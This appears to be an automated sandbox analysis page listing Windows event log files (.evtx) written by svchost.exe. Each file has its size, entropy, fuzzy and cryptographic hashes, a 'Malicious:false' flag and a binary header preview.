                                                                                                                                                                                                                                              SSDEEP:384:26IDxhIEIjIUIoIhNIDIkgIpNITbIxvIIyI6IEIRIUIVIEIQImIuWhDIEQAGxIHE:2/KWWZxGkilhKNWZxGkilhKf
                                                                                                                                                                                                                                              MD5:EF52C86BD67254C41CA1559308ED051C
                                                                                                                                                                                                                                              SHA1:FCA8FB5E149FB0658A3B00C4670C17B90C7A567B
                                                                                                                                                                                                                                              SHA-256:E6B6FB49A6374842698B7728851F05559E4721EB8E8E89E5E2F4C0FC65ECEEF7
                                                                                                                                                                                                                                              SHA-512:53E115D4E9546D54A408BCC53298825880AC82A6EDFAADB4DB36BF225F1DF91DC3D590A1BF2D93D9E0E9CCFDEEF350659EC0E274009DFE9103523017785E2572
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.T...............T...........................H......................................................................t...........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................................................a........F..........1........................................)..........................**......y.......#..m............E!.F..............................................................,.......D.....!........... ....@#..m.......`...a..`....... ...y....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l.......a...&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.8023807109333921
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:Fch6iIvcImIvITIQIoIoI3IEIMIoIBIOIRTIWeIZIEPdINI:FcoxXxP
                                                                                                                                                                                                                                              MD5:996D00E5A8B66706691FE697CCD68A7A
                                                                                                                                                                                                                                              SHA1:C90C99232451BAF2DCEB02C56C69CA9194390A9D
                                                                                                                                                                                                                                              SHA-256:95EF5245BEB2BBFD8EB8F5CE3A0C81869EF2AFACA54EF3445C3B144909C6A4B2
                                                                                                                                                                                                                                              SHA-512:FEA1D551151A622B151133814ECA8DE8EE4E3DA6D08F81CCE931FA7A64242E732A283E03A4B21EE922AF24F6FF0AF5EE2F26CDB7AA534583063C40F9C40DA0C8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................`"...#...l]....................................................................upp.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................^...............................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.999253421723821
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:h4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH130:j
                                                                                                                                                                                                                                              MD5:11CAFE60067FAE9C5A304C7A7DAC0EB5
                                                                                                                                                                                                                                              SHA1:0E72987588CB8557C7CD00AD3D8956CDC0593C35
                                                                                                                                                                                                                                              SHA-256:1AFA765FD9A0D9659C2A02A266ED4FD303C82BD9AFF45F0E7167E335F91E042E
                                                                                                                                                                                                                                              SHA-512:764A5D459803B989800473821647907FF484C914778A8AE42257E4791C1C1369E5490AB9365665C257045A007907981E78C1F2B4D5652BCA777873439537E9D0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................0...@......~....................................................................u!..................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.434419120849508
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Coj+1jN2RkG6OQFAWAbYgO0TKLyqHvaCmkyGU:Ci+y4AVKLyqHukyGU
                                                                                                                                                                                                                                              MD5:305B158F7163EB6D1E093A059DED207B
                                                                                                                                                                                                                                              SHA1:6B56D0D843EEEB0804AD648F7888CD25EC5D8DF7
                                                                                                                                                                                                                                              SHA-256:849D09E8541C4C51D8A81461E060A642E570F0A3E93CCE4820E03B91CC125F26
                                                                                                                                                                                                                                              SHA-512:2198E2701B77F09B8B86D45BD033A1DC2366D30861C0AE0F19E045DAD26F1ECB577865F2F8ACD9395562C43914DEFAAD03B0AA9D8733676E6E1018F8DEE18EF7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk._..............._...................P........s.T......................................................................?.................v...........................=...........................................................................................................................f...............?...........................m...................M...F..............................................................O'../.......................g...................g...............Og......w...........**..X..._..........`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.7602204514023913
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:ChP8o8Z85848V8M8g8D8R8E8J83W1d8b8ut8l8:CR
                                                                                                                                                                                                                                              MD5:A71D2A716E4B8C87379C50F91A376243
                                                                                                                                                                                                                                              SHA1:B55D17BCD95C285812D918E820EDC513B8BC4373
                                                                                                                                                                                                                                              SHA-256:4C279C417D131982DEF275E92EC2EB1CCF985E5A5785B8989D28972A72AAD650
                                                                                                                                                                                                                                              SHA-512:4759EE9F1D1DF7F9C3452A40C1A58C66A8928378CC69B464944C4732BC5042BE1FFA81996F5943702CF7379C632B41081F9109421EB9A2243CCF06AF02BC45E8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........................................8!..=.......................................................................w]..........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......v...............................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):3.777787992757215
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:9XhSUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:9XonS
                                                                                                                                                                                                                                              MD5:E6FF7A295152A36E7A222547BF78A53E
                                                                                                                                                                                                                                              SHA1:F50EEB5B1479494B8E1E932F8825715ECB99CD26
                                                                                                                                                                                                                                              SHA-256:F1D9EA9F88F9D1A614750D11EBC2BC9278F8ABB2DD8D28ECE3998D0D13C12ADC
                                                                                                                                                                                                                                              SHA-512:3BC89C8ECBC8F5F8557C0C41E3F15BD0F6F9753DD46BA2C878133EE6AF88EEF7335773FCF0649FF1D457BD697FC87CA88859C08D3C29450D50F2365B11655FD7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........*...............*...........(N...O..............................................................................................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........=......................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.4655200384785823
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:m0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O5vaP4eZiGai2niL9i5:ucE5
                                                                                                                                                                                                                                              MD5:EC1441AF347A3AEBD3C499EB77112044
                                                                                                                                                                                                                                              SHA1:062F0645AF0FF401308A0582362E6FE001C5444F
                                                                                                                                                                                                                                              SHA-256:97F7D6CF9603D2EF964F3D680F5902853382AE270ED6A37576364BD19E0A1C4A
                                                                                                                                                                                                                                              SHA-512:687D850AB0E8E4E75E484ED8E56658749F1331854AD6E28400538F050E3F372CA791023C87CE192D1417C70E63C0911E589AD9AE103CE30BB68A03EED414AABA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........@...............@............{..@}....c.....................................................................].................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&................................................b..........%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):86488
                                                                                                                                                                                                                                              Entropy (8bit):2.2476118306014543
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:lhNiwCrtrlXbaDQX/5pbiN5p6iN5yYXiN5pZiN5pIiN5pLiN5pZDiN5p+iN5yYTr:l6A6EV
                                                                                                                                                                                                                                              MD5:B05A4EAB64EA7342B26E8328102FA68A
                                                                                                                                                                                                                                              SHA1:1C0267DB4EF9F39A640E227723773547112FB232
                                                                                                                                                                                                                                              SHA-256:B58AEBD6EA0869E93FB7B1489F648A3F8631DC7DA5D0692DB59370DCE6C690FA
                                                                                                                                                                                                                                              SHA-512:ACE2CE5945F613582D09B15907F4DDABB2348E4BCA409DA3F81A9DA69A210931E53197DD3EA9708E023239F3E3666A4C6C9E45E5D11026049A8800D286BDCB83
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.'.......0.......'.......0............E..`L....B.....................................................................\M..................^...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................7.......................&...............................................................................**......'........D.Y_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.335307911754908
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:NpQ/hDGCyCkCzCRCFCaC5ClCWQCyCiECLCtmWCTCYCflCdCEtC0C6gCwzChWCVJY:NpQ/dJjm6EIf8aG3e
                                                                                                                                                                                                                                              MD5:DEC13E419235D71E66C768AF61C819EB
                                                                                                                                                                                                                                              SHA1:C2601E3DF8A2D6E230D368CA0ECDD4BD11786D1A
                                                                                                                                                                                                                                              SHA-256:E9AAB8B817BC34F1B7009A6ABC439ACD1EFC991293198857268699458DF84552
                                                                                                                                                                                                                                              SHA-512:A78230EF0961E00D27B109F0EEF6DEDB9198759E1858C1DCB8C0E1032D48242C23726BB2931EE62A47A5C4D8434CD3BB537B0E6DF85D62653E3648A49A22AA3D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.U...............U.............................w..................................................................... j..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................1[..............................&........>......................................y.......................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.470554172113501
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:J0dBaHTmPeG68WdEWx/Tm3vaA1YNNd/vTGMk1o4X7BOBrc3gkWqJfECYqzGDXbJm:J0razmmG/WCWlTYvn1ANxvqMYo4XdOBH
                                                                                                                                                                                                                                              MD5:7C2BA3824E6FDFDC9B34997831CF5BA4
                                                                                                                                                                                                                                              SHA1:2F75B2D7953CA1F3F139E66C1C1C785DC11F6F0B
                                                                                                                                                                                                                                              SHA-256:902EC3153154EDF682DF6D35860B9D42B3C6016F787D02E0CC1D2371F3997192
                                                                                                                                                                                                                                              SHA-512:4BC9FFCB38302D4764B8632EC360FFDE079EF9818F6128BE07F6E89671A510A32AC93145F3FDB4CDBD6363390EAB157D8B164C2B04B86A36C3B93A08AE7A6B52
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................h...i.....n....................................................................n.2.................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**..8............C',_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):70808
                                                                                                                                                                                                                                              Entropy (8bit):4.472924735663251
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:onXV0TICymdzj+j9GvEkeLhw6IrKOu4zB5c63VJ7qhFRbw7ZGnCg7HZANhlPqizg:onXVUICymdzj+j9GvEkeLhw6IrKOu4z0
                                                                                                                                                                                                                                              MD5:25D1597DE9A01526EC4658342283998A
                                                                                                                                                                                                                                              SHA1:87BA0EC37178FA40247A5FB5E00AE03A36486DE9
                                                                                                                                                                                                                                              SHA-256:656F9367917ABB180227C8DB8137B6DF16B8553FAAA0778A658FE5C3A522D8A3
                                                                                                                                                                                                                                              SHA-512:0E19DD07AB470357F275ADA42AD34712CA25A7F37528199C5E0E4471B350DD81BCE1741F2A34F9C5747D1F4901A35A92A608F648FFC04B47E52CDF9D9B832329
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........#...............#...............(..............................................................................................8.......................`...=...........................................................................................................................f...............?...........................m...................M...F...............................................................9...&...........................q.......I...................................Q.......**..x...........=..k............E!&...............................................................8.......P.....!....nqm......... =..k........o.VL.A.....@....H............................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e..n30'.|D..Q.R.a.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.-.C.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......L...............x...**..(..............k............E!&...............................................................8.......P.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.5283250731919766
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:YeUThv707s7a7v7yP7c7V7u7C7Z7C7M7n7K7G7d7Yp7PC787h7H7l73+7L7L7j7s:YeUTRVb
                                                                                                                                                                                                                                              MD5:9CB77B06F0F33B4BC7A638085998A032
                                                                                                                                                                                                                                              SHA1:04C57BABBE0B49A1AF70143FD2D9ED9071A14D5C
                                                                                                                                                                                                                                              SHA-256:AC3F98137ECCA65B1C5EBDF80B02F693E51AEA05B0B033CCB9A91C68778FF751
                                                                                                                                                                                                                                              SHA-512:488788029BCCEA4A3D2C8ED7492D895469BE0962884BC868F080E9CB479AF7ECDAF46E17FC08C9912B953E614E9DEE673DF994170931A99D9E28248117C6F4F8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................0y...{.._N......................................................................%.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................-@..............E9..m...................&.......................................................->......................**..8...........D...`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):2.268440759929627
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:whc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinJ:w6Ovc0S5UyEeDgLvqSX79K
                                                                                                                                                                                                                                              MD5:3E6903B4F529505011694E65B60A9154
                                                                                                                                                                                                                                              SHA1:05BC372041FD161154C35F843BFE439066F3A6C6
                                                                                                                                                                                                                                              SHA-256:E7BB68D43D88025FC2EC47BCA4957A08CEDF53FAA24751D95019CEF867223393
                                                                                                                                                                                                                                              SHA-512:8C700C45A3A01A79F9E0AB74BE5C0E718E231AAD4395F631A3DADA5C83E937EEBD0804DB0AF340A341440414ACD9293713B9ECB1A074F5E794CA21DFAB8D8CA0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.........?...............?............q...s..>O......................................................................C.*.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................6^..............................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):0.8178355996317889
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:HhGuZumutu4uEu5uOuDuyb2uPu1uuuCeuDu7utu:HD
                                                                                                                                                                                                                                              MD5:FFB7825ACA321A39E4DD495EC4B7E3BE
                                                                                                                                                                                                                                              SHA1:A4EBE4617E4B98D93FDE5546893A4D29441B5F44
                                                                                                                                                                                                                                              SHA-256:F56C28857B0E8D30F34089306B9CCF6655F7ED073412E710AB10D747092DA0D2
                                                                                                                                                                                                                                              SHA-512:86D7C252C870B9362394CFA35B99AE257228E477A5346D8EF5B91E81F3A78CD008DC52A5F3D12C395EFB715F82B849CAD805AD71CF8C58514614F83EACB4F63E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk......................................"...$....u.....................................................................v..C................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......>...............................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):4.075909180265887
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:NhzAsAvAaAmANSAbNAQAfCHA+AHchArAXATAvAjALATABAtGABS78jAOAqA4eAEp:NGCs2k64i/tpqA
                                                                                                                                                                                                                                              MD5:3A282029B03747ACB9F0A3496C717BD9
                                                                                                                                                                                                                                              SHA1:705490A345F883E024CC1641981A90DA6EDADCF5
                                                                                                                                                                                                                                              SHA-256:2A94A3FFC2481031F58367AB9F99D7972299D7F537520D2A6318B1BAA6B158F8
                                                                                                                                                                                                                                              SHA-512:F98AEB35B035B10B5C3CCA876E445D502AD84F66BE857B17EFE715983F9834ECAEDCCE5FF03914853115DE1644E9541FF111BD79A3607FA707735546A0C04AD4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:ElfChnk.....................................H.......}{........................................................................dE................<.......................d...=...........................................................................................................................f...............?...........................m...................M...F............................+.......................%..............&...............................................................................**..............|..3_...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                              Entropy (8bit):3.162414582102809
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:khVpW2pPkpPrpPepP1pP4pPHpPypPxpPYpPDpPypPlpPct1pPnpPsLpPAWpPQpPT:k+tZb
                                                                                                                                                                                                                                              MD5:0D76B94CB673E07C9297775F6635BB30
                                                                                                                                                                                                                                              SHA1:42037C8D133B4CD395BA6BDC1108C30882248866
                                                                                                                                                                                                                                              SHA-256:7133E41E960AD5F46294DCBDC3FFE8CFCFD120213DF680017947924D3C013A8B
